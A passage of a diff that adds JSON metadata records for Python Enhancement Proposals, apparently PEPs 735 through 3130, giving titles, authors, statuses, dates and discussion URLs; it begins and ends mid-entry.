`__", + "resolution": "`10-Oct-2024 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0735/" + }, + "736": { + "number": 736, + "title": "Shorthand syntax for keyword arguments at invocation", + "authors": "Joshua Bambrick, Chris Angelico", + "discussions_to": "https://discuss.python.org/t/pep-736-keyword-argument-shorthand-final-draft/58504", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "28-Nov-2023", + "python_version": "3.14", + "post_history": "`14-Oct-2023 `__, `17-Jan-2024 `__, `17-Jul-2024 `__,", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0736/" + }, + "737": { + "number": 737, + "title": "C API to format a type fully qualified name", + "authors": "Victor Stinner", + "discussions_to": "https://discuss.python.org/t/pep-737-unify-type-name-formatting/39872", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "29-Nov-2023", + "python_version": "3.13", + "post_history": "`29-Nov-2023 `__", + "resolution": "https://discuss.python.org/t/pep-737-unify-type-name-formatting/39872/60", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0737/" + }, + "738": { + "number": 738, + "title": "Adding Android as a supported platform", + "authors": "Malcolm Smith", + "discussions_to": "https://discuss.python.org/t/pep-738-adding-android-as-a-supported-platform/40975", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "12-Dec-2023", + "python_version": "3.13", + "post_history": null, + "resolution": "https://discuss.python.org/t/pep-738-adding-android-as-a-supported-platform/40975/23", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0738/" + }, + "739": { + "number": 739, + "title": "Static description file for build details of Python installations", + "authors": "Filipe La\u00edns", + "discussions_to": "https://discuss.python.org/t/pep-739-static-description-file-for-build-details-of-python-installations/44572", + 
"status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "19-Dec-2023", + "python_version": "3.14", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0739/" + }, + "740": { + "number": 740, + "title": "Index support for digital attestations", + "authors": "William Woodruff, Facundo Tuesca, Dustin Ingram", + "discussions_to": "https://discuss.python.org/t/pep-740-index-support-for-digital-attestations/44498", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "08-Jan-2024", + "python_version": null, + "post_history": "`02-Jan-2024 `__, `29-Jan-2024 `__", + "resolution": "`17-Jul-2024 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0740/" + }, + "741": { + "number": 741, + "title": "Python Configuration C API", + "authors": "Victor Stinner", + "discussions_to": "https://discuss.python.org/t/pep-741-python-configuration-c-api-second-version/45403", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "18-Jan-2024", + "python_version": "3.14", + "post_history": "`19-Jan-2024 `__, `08-Feb-2024 `__,", + "resolution": "https://discuss.python.org/t/pep-741-python-configuration-c-api-second-version/45403/88", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0741/" + }, + "742": { + "number": 742, + "title": "Narrowing types with TypeIs", + "authors": "Jelle Zijlstra", + "discussions_to": "https://discuss.python.org/t/pep-742-narrowing-types-with-typenarrower/45613", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "07-Feb-2024", + "python_version": "3.13", + "post_history": "`11-Feb-2024 `__", + "resolution": "`03-Apr-2024 `__", + "requires": null, + "replaces": "724", + "superseded_by": null, + "url": "https://peps.python.org/pep-0742/" + }, + "743": { + "number": 743, + "title": "Add Py_COMPAT_API_VERSION to the Python C API", + "authors": "Victor Stinner, Petr Viktorin", + "discussions_to": "https://discuss.python.org/t/pep-743-add-py-compat-api-version-to-the-python-c-api-take-2/59323", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "11-Mar-2024", + "python_version": "3.14", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0743/" + }, + "744": { + "number": 744, + "title": "JIT Compilation", + "authors": "Brandt Bucher, Savannah Ostrowski", + "discussions_to": "https://discuss.python.org/t/pep-744-jit-compilation/50756", + "status": "Draft", + "type": "Informational", + "topic": "", + "created": "11-Apr-2024", + "python_version": "3.13", + "post_history": "`11-Apr-2024 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0744/" + }, + "745": { + "number": 745, + "title": "Python 3.14 Release Schedule", + "authors": "Hugo van Kemenade", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "release", + "created": "24-Apr-2024", + "python_version": "3.14", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0745/" + }, + "746": { + "number": 746, + "title": "Type checking Annotated metadata", + "authors": "Adrian Garcia Badaracco", + 
"discussions_to": "https://discuss.python.org/t/pep-746-typedmetadata-for-type-checking-of-pep-593-annotated/53834", + "status": "Draft", + "type": "Standards Track", + "topic": "typing", + "created": "20-May-2024", + "python_version": "3.14", + "post_history": "20-May-2024", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0746/" + }, + "747": { + "number": 747, + "title": "Annotating Type Forms", + "authors": "David Foster, Eric Traut", + "discussions_to": "https://discuss.python.org/t/pep-747-typeexpr-type-hint-for-a-type-expression/55984", + "status": "Draft", + "type": "Standards Track", + "topic": "typing", + "created": "27-May-2024", + "python_version": "3.14", + "post_history": "`19-Apr-2024 `__, `04-May-2024 `__, `17-Jun-2024 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0747/" + }, + "748": { + "number": 748, + "title": "A Unified TLS API for Python", + "authors": "Joop van de Pol, William Woodruff", + "discussions_to": "https://discuss.python.org/t/pre-pep-discussion-revival-of-pep-543/51263", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "27-Jun-2024", + "python_version": "3.14", + "post_history": "`17-Apr-2024 `__", + "resolution": null, + "requires": null, + "replaces": "543", + "superseded_by": null, + "url": "https://peps.python.org/pep-0748/" + }, + "749": { + "number": 749, + "title": "Implementing PEP 649", + "authors": "Jelle Zijlstra", + "discussions_to": "https://discuss.python.org/t/pep-749-implementing-pep-649/54974", + "status": "Draft", + "type": "Standards Track", + "topic": "typing", + "created": "28-May-2024", + "python_version": "3.14", + "post_history": "`04-Jun-2024 `__", + "resolution": null, + "requires": "649", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0749/" + }, + "750": { + "number": 750, + "title": "Template Strings", + "authors": "Jim Baker, Guido van Rossum, Paul Everitt, Koudai Aono, Lysandros Nikolaou, Dave Peck", + "discussions_to": "https://discuss.python.org/t/pep-750-tag-strings-for-writing-domain-specific-languages/60408", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "08-Jul-2024", + "python_version": "3.14", + "post_history": "`09-Aug-2024 `__, `17-Oct-2024 `__, `21-Oct-2024 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0750/" + }, + "751": { + "number": 751, + "title": "A file format to record Python dependencies for installation reproducibility", + "authors": "Brett Cannon", + "discussions_to": null, + "status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "24-Jul-2024", + "python_version": null, + "post_history": "`25-Jul-2024 `__ `30-Oct-2024 `__", + "resolution": null, + "requires": null, + "replaces": "665", + "superseded_by": null, + "url": "https://peps.python.org/pep-0751/" + }, + "752": { + "number": 752, + "title": "Implicit namespaces for package repositories", + "authors": "Ofek Lev", + "discussions_to": "https://discuss.python.org/t/63192", + "status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "13-Aug-2024", + "python_version": null, + "post_history": "`18-Aug-2024 `__, `07-Sep-2024 `__,", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0752/" + 
}, + "753": { + "number": 753, + "title": "Uniform project URLs in core metadata", + "authors": "William Woodruff, Facundo Tuesca", + "discussions_to": "https://discuss.python.org/t/pep-753-uniform-urls-in-core-metadata/62792", + "status": "Accepted", + "type": "Standards Track", + "topic": "packaging", + "created": "29-Aug-2024", + "python_version": null, + "post_history": "`26-Aug-2024 `__, `03-Sep-2024 `__", + "resolution": "`10-Oct-2024 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0753/" + }, + "754": { + "number": 754, + "title": "IEEE 754 Floating Point Special Values", + "authors": "Gregory R. Warnes", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "28-Mar-2003", + "python_version": "2.3", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0754/" + }, + "755": { + "number": 755, + "title": "Implicit namespace policy for PyPI", + "authors": "Ofek Lev", + "discussions_to": "https://discuss.python.org/t/63191", + "status": "Draft", + "type": "Process", + "topic": "packaging", + "created": "05-Sep-2024", + "python_version": null, + "post_history": "`07-Sep-2024 `__,", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0755/" + }, + "756": { + "number": 756, + "title": "Add PyUnicode_Export() and PyUnicode_Import() C functions", + "authors": "Victor Stinner", + "discussions_to": "https://discuss.python.org/t/63891", + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "13-Sep-2024", + "python_version": "3.14", + "post_history": "`14-Sep-2024 `__", + "resolution": "`29-Oct-2024 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0756/" + }, + "757": { + "number": 757, + "title": "C API to import-export Python integers", + "authors": "Sergey B Kirpichev, Victor Stinner", + "discussions_to": "https://discuss.python.org/t/63895", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "13-Sep-2024", + "python_version": "3.14", + "post_history": "`14-Sep-2024 `__", + "resolution": "`08-Dec-2024 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0757/" + }, + "758": { + "number": 758, + "title": "Allow ``except`` and ``except*`` expressions without parentheses", + "authors": "Pablo Galindo, Brett Cannon", + "discussions_to": null, + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "30-Sep-2024", + "python_version": "3.14", + "post_history": "`02-Oct-2024 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0758/" + }, + "759": { + "number": 759, + "title": "External Wheel Hosting", + "authors": "Barry Warsaw, Ethan Smith", + "discussions_to": "https://discuss.python.org/t/pep-759-external-wheel-hosting/66458", + "status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "01-Oct-2024", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0759/" + }, + "760": { + "number": 760, + "title": "No More Bare Excepts", + "authors": "Pablo Galindo, Brett Cannon", + "discussions_to": null, + "status": 
"Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "02-Oct-2024", + "python_version": "3.14", + "post_history": "`09-Oct-2024 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0760/" + }, + "761": { + "number": 761, + "title": "Deprecating PGP signatures for CPython artifacts", + "authors": "Seth Michael Larson", + "discussions_to": "https://discuss.python.org/t/pep-761-deprecating-pgp-signatures-for-cpython-artifacts/67180", + "status": "Active", + "type": "Process", + "topic": "", + "created": "08-Oct-2024", + "python_version": "3.14", + "post_history": "`25-Sep-2024 `__, `09-Oct-2024 `__", + "resolution": "`06-Nov-2024 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0761/" + }, + "762": { + "number": 762, + "title": "REPL-acing the default REPL", + "authors": "Pablo Galindo Salgado, \u0141ukasz Langa, Lysandros Nikolaou, Emily Morehouse-Valcarcel", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "", + "created": "11-Oct-2024", + "python_version": "3.13", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0762/" + }, + "763": { + "number": 763, + "title": "Limiting deletions on PyPI", + "authors": "William Woodruff, Alexis Challande", + "discussions_to": "https://discuss.python.org/t/69487", + "status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "24-Oct-2024", + "python_version": null, + "post_history": "`09-Jul-2022 `__, `01-Oct-2024 `__, `28-Oct-2024 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0763/" + }, + "765": { + "number": 765, + "title": "Disallow return/break/continue that exit a finally block", + "authors": "Irit Katriel, Alyssa Coghlan", + "discussions_to": "https://discuss.python.org/t/pep-765-disallow-return-break-continue-that-exit-a-finally-block/71348", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "15-Nov-2024", + "python_version": "3.14", + "post_history": "`09-Nov-2024 `__, `16-Nov-2024 `__,", + "resolution": null, + "requires": null, + "replaces": "601", + "superseded_by": null, + "url": "https://peps.python.org/pep-0765/" + }, + "766": { + "number": 766, + "title": "Explicit Priority Choices Among Multiple Indexes", + "authors": "Michael Sarahan", + "discussions_to": "https://discuss.python.org/t/pep-for-handling-multiple-indexes-index-priority/71589", + "status": "Draft", + "type": "Informational", + "topic": "packaging", + "created": "18-Nov-2024", + "python_version": null, + "post_history": "`18-Nov-2024 `__,", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0766/" + }, + "767": { + "number": 767, + "title": "Annotating Read-Only Attributes", + "authors": "Eneg", + "discussions_to": "https://discuss.python.org/t/pep-767-annotating-read-only-attributes/73408", + "status": "Draft", + "type": "Standards Track", + "topic": "typing", + "created": "18-Nov-2024", + "python_version": "3.14", + "post_history": "`09-Oct-2024 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0767/" + }, + "768": { + "number": 768, + "title": "Safe external debugger interface for CPython", + 
"authors": "Pablo Galindo Salgado, Matt Wozniski, Ivona Stojanovic", + "discussions_to": "https://discuss.python.org/t/pep-768-safe-external-debugger-interface-for-cpython/73969", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "25-Nov-2024", + "python_version": "3.14", + "post_history": "`11-Dec-2024 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0768/" + }, + "777": { + "number": 777, + "title": "How to Re-invent the Wheel", + "authors": "Ethan Smith", + "discussions_to": "https://discuss.python.org/t/pep-777-how-to-re-invent-the-wheel/67484", + "status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "09-Oct-2024", + "python_version": null, + "post_history": "`10-Oct-2024 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0777/" + }, + "789": { + "number": 789, + "title": "Preventing task-cancellation bugs by limiting yield in async generators", + "authors": "Zac Hatfield-Dodds, Nathaniel J. Smith", + "discussions_to": "https://discuss.python.org/t/preventing-yield-inside-certain-context-managers/1091", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "14-May-2024", + "python_version": "3.14", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0789/" + }, + "801": { + "number": 801, + "title": "Reserved", + "authors": "Barry Warsaw", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "", + "created": "21-Jun-2018", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0801/" + }, + "2026": { + "number": 2026, + "title": "Calendar versioning for Python", + "authors": "Hugo van Kemenade", + "discussions_to": "https://discuss.python.org/t/pep-2026-calendar-versioning-for-python/55782", + "status": "Draft", + "type": "Process", + "topic": "", + "created": "11-Jun-2024", + "python_version": "3.26", + "post_history": "`14-Jun-2024 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-2026/" + }, + "3000": { + "number": 3000, + "title": "Python 3000", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Process", + "topic": "", + "created": "05-Apr-2006", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3000/" + }, + "3001": { + "number": 3001, + "title": "Procedure for reviewing and improving standard library modules", + "authors": "Georg Brandl", + "discussions_to": null, + "status": "Withdrawn", + "type": "Process", + "topic": "", + "created": "05-Apr-2006", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3001/" + }, + "3002": { + "number": 3002, + "title": "Procedure for Backwards-Incompatible Changes", + "authors": "Steven Bethard", + "discussions_to": null, + "status": "Final", + "type": "Process", + "topic": "", + "created": "27-Mar-2006", + "python_version": null, + "post_history": "27-Mar-2006, 13-Apr-2006", + "resolution": 
null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3002/" + }, + "3003": { + "number": 3003, + "title": "Python Language Moratorium", + "authors": "Brett Cannon, Jesse Noller, Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Process", + "topic": "", + "created": "21-Oct-2009", + "python_version": null, + "post_history": "03-Nov-2009", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3003/" + }, + "3099": { + "number": 3099, + "title": "Things that will Not Change in Python 3000", + "authors": "Georg Brandl", + "discussions_to": null, + "status": "Final", + "type": "Process", + "topic": "", + "created": "04-Apr-2006", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3099/" + }, + "3100": { + "number": 3100, + "title": "Miscellaneous Python 3.0 Plans", + "authors": "Brett Cannon", + "discussions_to": null, + "status": "Final", + "type": "Process", + "topic": "", + "created": "20-Aug-2004", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3100/" + }, + "3101": { + "number": 3101, + "title": "Advanced String Formatting", + "authors": "Talin", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "16-Apr-2006", + "python_version": "3.0", + "post_history": "28-Apr-2006, 06-May-2006, 10-Jun-2007, 14-Aug-2007, 14-Sep-2008", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3101/" + }, + "3102": { + "number": 3102, + "title": "Keyword-Only Arguments", + "authors": "Talin", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "22-Apr-2006", + "python_version": "3.0", + "post_history": "28-Apr-2006, 19-May-2006", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3102/" + }, + "3103": { + "number": 3103, + "title": "A Switch/Case Statement", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "25-Jun-2006", + "python_version": "3.0", + "post_history": "26-Jun-2006", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3103/" + }, + "3104": { + "number": 3104, + "title": "Access to Names in Outer Scopes", + "authors": "Ka-Ping Yee", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "12-Oct-2006", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3104/" + }, + "3105": { + "number": 3105, + "title": "Make print a function", + "authors": "Georg Brandl", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "19-Nov-2006", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3105/" + }, + "3106": { + "number": 3106, + "title": "Revamping dict.keys(), 
.values() and .items()", + "authors": "Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "19-Dec-2006", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3106/" + }, + "3107": { + "number": 3107, + "title": "Function Annotations", + "authors": "Collin Winter, Tony Lownds", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "02-Dec-2006", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3107/" + }, + "3108": { + "number": 3108, + "title": "Standard Library Reorganization", + "authors": "Brett Cannon", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "01-Jan-2007", + "python_version": "3.0", + "post_history": "28-Apr-2008", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3108/" + }, + "3109": { + "number": 3109, + "title": "Raising Exceptions in Python 3000", + "authors": "Collin Winter", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "19-Jan-2006", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3109/" + }, + "3110": { + "number": 3110, + "title": "Catching Exceptions in Python 3000", + "authors": "Collin Winter", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "16-Jan-2006", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3110/" + }, + "3111": { + "number": 3111, + "title": "Simple input built-in in Python 3000", + "authors": "Andre Roberge", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "13-Sep-2006", + "python_version": "3.0", + "post_history": "22-Dec-2006", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3111/" + }, + "3112": { + "number": 3112, + "title": "Bytes literals in Python 3000", + "authors": "Jason Orendorff", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "23-Feb-2007", + "python_version": "3.0", + "post_history": "23-Feb-2007", + "resolution": null, + "requires": "358", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3112/" + }, + "3113": { + "number": 3113, + "title": "Removal of Tuple Parameter Unpacking", + "authors": "Brett Cannon", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "02-Mar-2007", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3113/" + }, + "3114": { + "number": 3114, + "title": "Renaming iterator.next() to iterator.__next__()", + "authors": "Ka-Ping Yee", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "04-Mar-2007", + 
"python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3114/" + }, + "3115": { + "number": 3115, + "title": "Metaclasses in Python 3000", + "authors": "Talin", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "07-Mar-2007", + "python_version": "3.0", + "post_history": "11-Mar-2007, 14-Mar-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3115/" + }, + "3116": { + "number": 3116, + "title": "New I/O", + "authors": "Daniel Stutzbach, Guido van Rossum, Mike Verdone", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "26-Feb-2007", + "python_version": "3.0", + "post_history": "26-Feb-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3116/" + }, + "3117": { + "number": 3117, + "title": "Postfix type declarations", + "authors": "Georg Brandl", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "01-Apr-2007", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3117/" + }, + "3118": { + "number": 3118, + "title": "Revising the buffer protocol", + "authors": "Travis Oliphant, Carl Banks", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "28-Aug-2006", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3118/" + }, + "3119": { + "number": 3119, + "title": "Introducing Abstract Base Classes", + "authors": "Guido van Rossum, Talin", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "18-Apr-2007", + "python_version": "3.0", + "post_history": "26-Apr-2007, 11-May-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3119/" + }, + "3120": { + "number": 3120, + "title": "Using UTF-8 as the default source encoding", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "15-Apr-2007", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3120/" + }, + "3121": { + "number": 3121, + "title": "Extension Module Initialization and Finalization", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "27-Apr-2007", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3121/" + }, + "3122": { + "number": 3122, + "title": "Delineation of the main module", + "authors": "Brett Cannon", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "27-Apr-2007", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, 
+ "url": "https://peps.python.org/pep-3122/" + }, + "3123": { + "number": 3123, + "title": "Making PyObject_HEAD conform to standard C", + "authors": "Martin von L\u00f6wis", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "27-Apr-2007", + "python_version": "3.0", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3123/" + }, + "3124": { + "number": 3124, + "title": "Overloading, Generic Functions, Interfaces, and Adaptation", + "authors": "Phillip J. Eby", + "discussions_to": "python-3000@python.org", + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "28-Apr-2007", + "python_version": null, + "post_history": "30-Apr-2007", + "resolution": null, + "requires": "3107, 3115, 3119", + "replaces": "245, 246", + "superseded_by": null, + "url": "https://peps.python.org/pep-3124/" + }, + "3125": { + "number": 3125, + "title": "Remove Backslash Continuation", + "authors": "Jim J. Jewett", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "29-Apr-2007", + "python_version": null, + "post_history": "29-Apr-2007, 30-Apr-2007, 04-May-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3125/" + }, + "3126": { + "number": 3126, + "title": "Remove Implicit String Concatenation", + "authors": "Jim J. Jewett, Raymond Hettinger", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "29-Apr-2007", + "python_version": null, + "post_history": "29-Apr-2007, 30-Apr-2007, 07-May-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3126/" + }, + "3127": { + "number": 3127, + "title": "Integer Literal Support and Syntax", + "authors": "Patrick Maupin", + "discussions_to": "python-3000@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "14-Mar-2007", + "python_version": "3.0", + "post_history": "18-Mar-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3127/" + }, + "3128": { + "number": 3128, + "title": "BList: A Faster List-like Type", + "authors": "Daniel Stutzbach", + "discussions_to": "python-3000@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "30-Apr-2007", + "python_version": "2.6, 3.0", + "post_history": "30-Apr-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3128/" + }, + "3129": { + "number": 3129, + "title": "Class Decorators", + "authors": "Collin Winter", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "01-May-2007", + "python_version": "3.0", + "post_history": "07-May-2007", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-3129/" + }, + "3130": { + "number": 3130, + "title": "Access to Current Module/Class/Function", + "authors": "Jim J. 
